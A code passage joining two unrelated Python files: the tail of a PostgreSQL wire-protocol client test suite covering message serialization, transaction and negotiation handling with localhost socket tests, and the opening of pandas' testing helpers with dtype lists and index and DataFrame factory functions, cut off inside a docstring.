e3.TupleDescriptor((
(b'name', 123, 1, 1, 0, 0, 1,),
) * 1000),
e3.Tuple([]),
e3.Tuple([b'foo',]),
e3.Tuple([None]),
e3.Tuple([b'foo',b'bar']),
e3.Tuple([None, None]),
e3.Tuple([None, b'foo', None]),
e3.Tuple([b'bar', None, b'foo', None, b'bleh']),
e3.Tuple([b'foo', b'bar'] * 100),
e3.Tuple([None] * 100),
e3.Query(b'select * from u'),
e3.Parse(b'statement_id', b'query', (123, 0)),
e3.Parse(b'statement_id', b'query', (123,)),
e3.Parse(b'statement_id', b'query', ()),
e3.Bind(b'portal_id', b'statement_id',
(b'tt',b'\x00\x00'),
[b'data',None], (b'ff',b'xx')),
e3.Bind(b'portal_id', b'statement_id', (b'tt',), [None], (b'xx',)),
e3.Bind(b'portal_id', b'statement_id', (b'ff',), [b'data'], ()),
e3.Bind(b'portal_id', b'statement_id', (), [], (b'xx',)),
e3.Bind(b'portal_id', b'statement_id', (), [], ()),
e3.Execute(b'portal_id', 500),
e3.Execute(b'portal_id', 0),
e3.DescribeStatement(b'statement_id'),
e3.DescribePortal(b'portal_id'),
e3.CloseStatement(b'statement_id'),
e3.ClosePortal(b'portal_id'),
e3.Function(123, (), [], b'xx'),
e3.Function(321, (b'tt',), [b'foo'], b'xx'),
e3.Function(321, (b'tt',), [None], b'xx'),
e3.Function(321, (b'aa', b'aa'), [None,b'a' * 200], b'xx'),
e3.FunctionResult(b''),
e3.FunctionResult(b'foobar'),
e3.FunctionResult(None),
e3.CopyToBegin(123, [321,123]),
e3.CopyToBegin(0, [10,]),
e3.CopyToBegin(123, []),
e3.CopyFromBegin(123, [321,123]),
e3.CopyFromBegin(0, [10]),
e3.CopyFromBegin(123, []),
e3.CopyData(b''),
e3.CopyData(b'foo'),
e3.CopyData(b'a' * 2048),
e3.CopyFail(b''),
e3.CopyFail(b'iiieeeeee!'),
]
class test_element3(unittest.TestCase):
def test_cat_messages(self):
# The optimized implementation will identify adjacent copy data, and
# take a more efficient route; so rigorously test the switch between the
# two modes.
self.assertEqual(e3.cat_messages([]), b'')
self.assertEqual(e3.cat_messages([b'foo']), b'd\x00\x00\x00\x07foo')
self.assertEqual(e3.cat_messages([b'foo', b'foo']), 2*b'd\x00\x00\x00\x07foo')
# copy, other, copy
self.assertEqual(e3.cat_messages([b'foo', e3.SynchronizeMessage, b'foo']),
b'd\x00\x00\x00\x07foo' + e3.SynchronizeMessage.bytes() + b'd\x00\x00\x00\x07foo')
# copy, other, copy*1000
self.assertEqual(e3.cat_messages(1000*[b'foo', e3.SynchronizeMessage, b'foo']),
1000*(b'd\x00\x00\x00\x07foo' + e3.SynchronizeMessage.bytes() + b'd\x00\x00\x00\x07foo'))
# other, copy, copy*1000
self.assertEqual(e3.cat_messages(1000*[e3.SynchronizeMessage, b'foo', b'foo']),
1000*(e3.SynchronizeMessage.bytes() + 2*b'd\x00\x00\x00\x07foo'))
pack_head = struct.Struct("!lH").pack
# tuple
self.assertEqual(e3.cat_messages([(b'foo',),]),
b'D' + pack_head(7 + 4 + 2, 1) + b'\x00\x00\x00\x03foo')
# tuple(foo,\N)
self.assertEqual(e3.cat_messages([(b'foo',None,),]),
b'D' + pack_head(7 + 4 + 4 + 2, 2) + b'\x00\x00\x00\x03foo\xFF\xFF\xFF\xFF')
# tuple(foo,\N,bar)
self.assertEqual(e3.cat_messages([(b'foo',None,b'bar'),]),
b'D' + pack_head(7 + 7 + 4 + 4 + 2, 3) + \
b'\x00\x00\x00\x03foo\xFF\xFF\xFF\xFF\x00\x00\x00\x03bar')
# too many attributes
self.assertRaises((OverflowError, struct.error),
e3.cat_messages, [(None,) * 0x10000])
class ThisEx(Exception):
pass
class ThatEx(Exception):
pass
class Bad(e3.Message):
def serialize(self):
raise ThisEx('foo')
self.assertRaises(ThisEx, e3.cat_messages, [Bad()])
class NoType(e3.Message):
def serialize(self):
return b''
self.assertRaises(AttributeError, e3.cat_messages, [NoType()])
class BadType(e3.Message):
type = 123
def serialize(self):
return b''
self.assertRaises((TypeError,struct.error), e3.cat_messages, [BadType()])
def testSerializeParseConsistency(self):
for msg in message_samples:
smsg = msg.serialize()
self.assertEqual(msg, msg.parse(smsg))
def testEmptyMessages(self):
for x in e3.__dict__.values():
if isinstance(x, e3.EmptyMessage):
xtype = type(x)
self.assertTrue(x is xtype())
def testUnknownNoticeFields(self):
N = e3.Notice.parse(b'\x00\x00Z\x00Xklsvdnvldsvkndvlsn\x00Pfoobar\x00Mmessage\x00')
E = e3.Error.parse(b'Z\x00Xklsvdnvldsvkndvlsn\x00Pfoobar\x00Mmessage\x00\x00')
self.assertEqual(N[b'M'], b'message')
self.assertEqual(E[b'M'], b'message')
self.assertEqual(N[b'P'], b'foobar')
self.assertEqual(E[b'P'], b'foobar')
self.assertEqual(len(N), 4)
self.assertEqual(len(E), 4)
def testCompleteExtracts(self):
x = e3.Complete(b'FOO BAR 1321')
self.assertEqual(x.extract_command(), b'FOO BAR')
self.assertEqual(x.extract_count(), 1321)
x = e3.Complete(b' CREATE TABLE 13210 ')
self.assertEqual(x.extract_command(), b'CREATE TABLE')
self.assertEqual(x.extract_count(), 13210)
x = e3.Complete(b' CREATE TABLE \t713210 ')
self.assertEqual(x.extract_command(), b'CREATE TABLE')
self.assertEqual(x.extract_count(), 713210)
x = e3.Complete(b' CREATE TABLE 0 \t13210 ')
self.assertEqual(x.extract_command(), b'CREATE TABLE')
self.assertEqual(x.extract_count(), 13210)
x = e3.Complete(b' 0 \t13210 ')
self.assertEqual(x.extract_command(), None)
self.assertEqual(x.extract_count(), 13210)
##
# .protocol.xact3 tests
##
xact_samples = [
# Simple contrived exchange.
(
(
e3.Query(b"COMPLETE"),
), (
e3.Complete(b'COMPLETE'),
e3.Ready(b'I'),
)
),
(
(
e3.Query(b"ROW DATA"),
), (
e3.TupleDescriptor((
(b'foo', 1, 1, 1, 1, 1, 1),
(b'bar', 1, 2, 1, 1, 1, 1),
)),
e3.Tuple((b'lame', b'lame')),
e3.Complete(b'COMPLETE'),
e3.Ready(b'I'),
)
),
(
(
e3.Query(b"ROW DATA"),
), (
e3.TupleDescriptor((
(b'foo', 1, 1, 1, 1, 1, 1),
(b'bar', 1, 2, 1, 1, 1, 1),
)),
e3.Tuple((b'lame', b'lame')),
e3.Tuple((b'lame', b'lame')),
e3.Tuple((b'lame', b'lame')),
e3.Tuple((b'lame', b'lame')),
e3.Ready(b'I'),
)
),
(
(
e3.Query(b"NULL"),
), (
e3.Null(),
e3.Ready(b'I'),
)
),
(
(
e3.Query(b"COPY TO"),
), (
e3.CopyToBegin(1, [1,2]),
e3.CopyData(b'row1'),
e3.CopyData(b'row2'),
e3.CopyDone(),
e3.Complete(b'COPY TO'),
e3.Ready(b'I'),
)
),
(
(
e3.Function(1, [b''], [b''], 1),
), (
e3.FunctionResult(b'foo'),
e3.Ready(b'I'),
)
),
(
(
e3.Parse(b"NAME", b"SQL", ()),
), (
e3.ParseComplete(),
)
),
(
(
e3.Bind(b"NAME", b"STATEMENT_ID", (), (), ()),
), (
e3.BindComplete(),
)
),
(
(
e3.Parse(b"NAME", b"SQL", ()),
e3.Bind(b"NAME", b"STATEMENT_ID", (), (), ()),
), (
e3.ParseComplete(),
e3.BindComplete(),
)
),
(
(
e3.Describe(b"STATEMENT_ID"),
), (
e3.AttributeTypes(()),
e3.NoData(),
)
),
(
(
e3.Describe(b"STATEMENT_ID"),
), (
e3.AttributeTypes(()),
e3.TupleDescriptor(()),
)
),
(
(
e3.CloseStatement(b"foo"),
), (
e3.CloseComplete(),
),
),
(
(
e3.ClosePortal(b"foo"),
), (
e3.CloseComplete(),
),
),
(
(
e3.Synchronize(),
), (
e3.Ready(b'I'),
),
),
]
class test_xact3(unittest.TestCase):
def testTransactionSamplesAll(self):
for xcmd, xres in xact_samples:
x = x3.Instruction(xcmd)
r = tuple([(y.type, y.serialize()) for y in xres])
x.state[1]()
self.assertEqual(x.messages, ())
x.state[1](r)
self.assertEqual(x.state, x3.Complete)
rec = []
for y in x.completed:
for z in y[1]:
if type(z) is type(b''):
z = e3.CopyData(z)
rec.append(z)
self.assertEqual(xres, tuple(rec))
def testClosing(self):
c = x3.Closing()
self.assertEqual(c.messages, (e3.DisconnectMessage,))
c.state[1]()
self.assertEqual(c.fatal, True)
self.assertEqual(c.error_message.__class__, e3.ClientError)
self.assertEqual(c.error_message[b'C'], '08003')
def testNegotiation(self):
# simple successful run
n = x3.Negotiation({}, b'')
n.state[1]()
n.state[1](
pairs(
e3.Notice(((b'M', b"foobar"),)),
e3.Authentication(e3.AuthRequest_OK, b''),
e3.KillInformation(0,0),
e3.ShowOption(b'name', b'val'),
e3.Ready(b'I'),
)
)
self.assertEqual(n.state, x3.Complete)
self.assertEqual(n.last_ready.xact_state, b'I')
# no killinfo.. should cause protocol error...
n = x3.Negotiation({}, b'')
n.state[1]()
n.state[1](
pairs(
e3.Notice(((b'M', b"foobar"),)),
e3.Authentication(e3.AuthRequest_OK, b''),
e3.ShowOption(b'name', b'val'),
e3.Ready(b'I'),
)
)
self.assertEqual(n.state, x3.Complete)
self.assertEqual(n.last_ready, None)
self.assertEqual(n.error_message[b'C'], '08P01')
# killinfo twice.. must cause protocol error...
n = x3.Negotiation({}, b'')
n.state[1]()
n.state[1](
pairs(
e3.Notice(((b'M', b"foobar"),)),
e3.Authentication(e3.AuthRequest_OK, b''),
e3.ShowOption(b'name', b'val'),
e3.KillInformation(0,0),
e3.KillInformation(0,0),
e3.Ready(b'I'),
)
)
self.assertEqual(n.state, x3.Complete)
self.assertEqual(n.last_ready, None)
self.assertEqual(n.error_message[b'C'], '08P01')
# start with ready message..
n = x3.Negotiation({}, b'')
n.state[1]()
n.state[1](
pairs(
e3.Notice(((b'M', b"foobar"),)),
e3.Ready(b'I'),
e3.Authentication(e3.AuthRequest_OK, b''),
e3.ShowOption(b'name', b'val'),
)
)
self.assertEqual(n.state, x3.Complete)
self.assertEqual(n.last_ready, None)
self.assertEqual(n.error_message[b'C'], '08P01')
# unsupported authreq
n = x3.Negotiation({}, b'')
n.state[1]()
n.state[1](
pairs(
e3.Authentication(255, b''),
)
)
self.assertEqual(n.state, x3.Complete)
self.assertEqual(n.last_ready, None)
self.assertEqual(n.error_message[b'C'], '--AUT')
def testInstructionAsynchook(self):
l = []
def hook(data):
l.append(data)
x = x3.Instruction([
e3.Query(b"NOTHING")
], asynchook = hook)
a1 = e3.Notice(((b'M', b"m1"),))
a2 = e3.Notify(0, b'relation', b'parameter')
a3 = e3.ShowOption(b'optname', b'optval')
# "send" the query message
x.state[1]()
# "receive" the tuple
x.state[1]([(a1.type, a1.serialize()),])
a2l = [(a2.type, a2.serialize()),]
x.state[1](a2l)
# validate that the hook is not fed twice because
# it's the exact same message set. (later assertion will validate)
x.state[1](a2l)
x.state[1]([(a3.type, a3.serialize()),])
# we only care about validating that l got everything.
self.assertEqual([a1,a2,a3], l)
self.assertEqual(x.state[0], x3.Receiving)
# validate that the asynchook exception is trapped.
class Nee(Exception):
pass
def ehook(msg):
raise Nee("this should **not** be part of the summary")
x = x3.Instruction([
e3.Query(b"NOTHING")
], asynchook = ehook)
a1 = e3.Notice(((b'M', b"m1"),))
x.state[1]()
import sys
v = None
def exchook(typ, val, tb):
nonlocal v
v = val
seh = sys.excepthook
sys.excepthook = exchook
# we only care about validating that the exchook got called.
x.state[1]([(a1.type, a1.serialize())])
sys.excepthook = seh
self.assertTrue(isinstance(v, Nee))
class test_client3(unittest.TestCase):
def test_timeout(self):
portnum = find_available_port()
servsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with servsock:
servsock.bind(('localhost', portnum))
pc = c3.Connection(
SocketFactory(
(socket.AF_INET, socket.SOCK_STREAM),
('localhost', portnum)
),
{}
)
pc.connect(timeout = 1)
try:
self.assertEqual(pc.xact.fatal, True)
self.assertEqual(pc.xact.__class__, x3.Negotiation)
finally:
if pc.socket is not None:
pc.socket.close()
def test_SSL_failure(self):
portnum = find_available_port()
servsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with servsock:
servsock.bind(('localhost', portnum))
pc = c3.Connection(
SocketFactory(
(socket.AF_INET, socket.SOCK_STREAM),
('localhost', portnum)
),
{}
)
exc = None
servsock.listen(1)
def client_thread():
pc.connect(ssl = True)
client = Thread(target = client_thread)
try:
client.start()
c, addr = servsock.accept()
with c:
c.send(b'S')
c.sendall(b'0000000000000000000000')
c.recv(1024)
c.close()
client.join()
finally:
if pc.socket is not None:
pc.socket.close()
self.assertEqual(pc.xact.fatal, True)
self.assertEqual(pc.xact.__class__, x3.Negotiation)
self.assertEqual(pc.xact.error_message.__class__, e3.ClientError)
self.assertTrue(hasattr(pc.xact, 'exception'))
def test_bad_negotiation(self):
portnum = find_available_port()
servsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
servsock.bind(('localhost', portnum))
pc = c3.Connection(
SocketFactory(
(socket.AF_INET, socket.SOCK_STREAM),
('localhost', portnum)
),
{}
)
exc = None
servsock.listen(1)
def client_thread():
pc.connect()
client = Thread(target = client_thread)
try:
client.start()
c, addr = servsock.accept()
try:
c.recv(1024)
finally:
c.close()
time.sleep(0.25)
client.join()
servsock.close()
self.assertEqual(pc.xact.fatal, True)
self.assertEqual(pc.xact.__class__, x3.Negotiation)
self.assertEqual(pc.xact.error_message.__class__, e3.ClientError)
self.assertEqual(pc.xact.error_message[b'C'], '08006')
finally:
servsock.close()
if pc.socket is not None:
pc.socket.close()
if __name__ == '__main__':
from types import ModuleType
this = ModuleType("this")
this.__dict__.update(globals())
try:
unittest.main(this)
finally:
import gc
gc.collect()
|
__init__.py | from __future__ import annotations
import collections
from datetime import datetime
from decimal import Decimal
from functools import wraps
import operator
import os
import re
import string
from typing import (
TYPE_CHECKING,
Callable,
ContextManager,
Counter,
Iterable,
)
import warnings
import numpy as np
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._typing import Dtype
from pandas.core.dtypes.common import (
is_datetime64_dtype,
is_datetime64tz_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
)
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas._testing._io import ( # noqa:F401
close,
network,
round_trip_localpath,
round_trip_pathlib,
round_trip_pickle,
with_connectivity_check,
write_to_compressed,
)
from pandas._testing._random import ( # noqa:F401
randbool,
rands,
rands_array,
randu_array,
)
from pandas._testing._warnings import assert_produces_warning # noqa:F401
from pandas._testing.asserters import ( # noqa:F401
assert_almost_equal,
assert_attr_equal,
assert_categorical_equal,
assert_class_equal,
assert_contains_all,
assert_copy,
assert_datetime_array_equal,
assert_dict_equal,
assert_equal,
assert_extension_array_equal,
assert_frame_equal,
assert_index_equal,
assert_interval_array_equal,
assert_is_sorted,
assert_is_valid_plot_return_object,
assert_numpy_array_equal,
assert_period_array_equal,
assert_series_equal,
assert_sp_array_equal,
assert_timedelta_array_equal,
raise_assert_detail,
)
from pandas._testing.compat import get_dtype # noqa:F401
from pandas._testing.contexts import ( # noqa:F401
RNGContext,
decompress_file,
ensure_clean,
ensure_clean_dir,
ensure_safe_environment_variables,
set_timezone,
use_numexpr,
with_csv_dialect,
)
from pandas.core.arrays import (
DatetimeArray,
PeriodArray,
TimedeltaArray,
period_array,
)
if TYPE_CHECKING:
from pandas import (
PeriodIndex,
TimedeltaIndex,
)
_N = 30
_K = 4
UNSIGNED_INT_DTYPES: list[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: list[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: list[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: list[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: list[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: list[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: list[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: list[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: list[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: list[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES: list[Dtype] = [bool, "bool"]
BYTES_DTYPES: list[Dtype] = [bytes, "bytes"]
OBJECT_DTYPES: list[Dtype] = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
NULL_OBJECTS = [None, np.nan, pd.NaT, float("nan"), pd.NA, Decimal("NaN")]
EMPTY_STRING_PATTERN = re.compile("^$")
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("always", category)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("ignore", category)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
expected = pd.array(expected)
elif box_cls is Index:
expected = Index(expected)
elif box_cls is Series:
expected = Series(expected)
elif box_cls is DataFrame:
expected = Series(expected).to_frame()
if transpose:
# for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length. But convert to two rows to avoid
# single-row special cases in datetime arithmetic
expected = expected.T
expected = pd.concat([expected] * 2, ignore_index=True)
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Others
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k: int = 10, freq="B", name=None, **kwargs) -> DatetimeIndex:
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k: int = 10, freq="D", name=None, **kwargs) -> TimedeltaIndex:
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k: int = 10, name=None, **kwargs) -> PeriodIndex:
dt = datetime(2000, 1, 1)
return pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
* id : int dtype with
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k: int = 10) -> Iterable[Index]:
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs: list[Callable[..., Index]] = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(np.random.randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(np.random.randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(np.random.randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(
np.random.randn(nper), index=makeDateIndex(nper, freq=freq), name=name
)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(np.random.randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame() -> DataFrame:
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func_dict: dict[str, Callable[..., Index]] = {
"i": makeIntIndex,
"f": makeFloatIndex,
"s": makeStringIndex,
"u": makeUnicodeIndex,
"dt": makeDateIndex,
"td": makeTimedeltaIndex,
"p": makePeriodIndex,
}
idx_func = idx_func_dict.get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
list_of_lists = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
# Deprecated since version 3.9: collections.Counter now supports []. See PEP 585
# and Generic Alias Type.
cnt: Counter[str] = collections.Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
list_of_lists.append(result)
tuples = list(zip(*list_of_lists))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
